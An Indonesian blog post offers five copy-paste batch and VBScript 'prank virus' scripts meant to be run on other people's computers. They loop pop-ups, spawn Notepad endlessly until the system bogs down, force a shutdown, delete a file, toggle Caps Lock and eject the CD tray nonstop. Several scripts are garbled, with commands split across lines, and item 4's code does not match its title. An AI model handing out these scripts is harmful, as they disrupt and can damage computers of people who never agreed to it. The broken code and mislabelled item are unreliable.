Buat Virus Lucu Dari Notepad - Agung Firdausi Blog

Buat Virus Lucu Dari Notepad


Dari sekian postingan tentang cara membuat virus di blog ini mungkin ini yang paling gokil dan jahil, karena tidak hanya komputernya yang bingung tapi orangnya juga akan jengkel.

Penasaran nih ?
Dibawah ada beberapa script kode untuk membuat virus silahkan di ubah atau langsung dikopi ke notepad anda.

1. Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program
yang sok-sok jadi virus :)

@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau............................
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat

 2.  Membuat Virus Wants to Be A Milionaire

@echo off

title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh...
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat


3. Membuka notepad terus-menerus

@ECHO off

:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat

4. Shutdown sendiri dan kirim pesan otomatis

Set wshShell

=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Simpan dengan .vbs

5. CD Room terbuka dan tertutup terus

Set oWMP = CreateObject

("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs

Catatan :
Hanya sekedar referensi agar lebih waspada terhadap setiap software atau program yang ada di computer, laptop atau di internet agar tidak mudah percaya begitu saja karena akibatnya sangat fatal.


Previous
Next Post »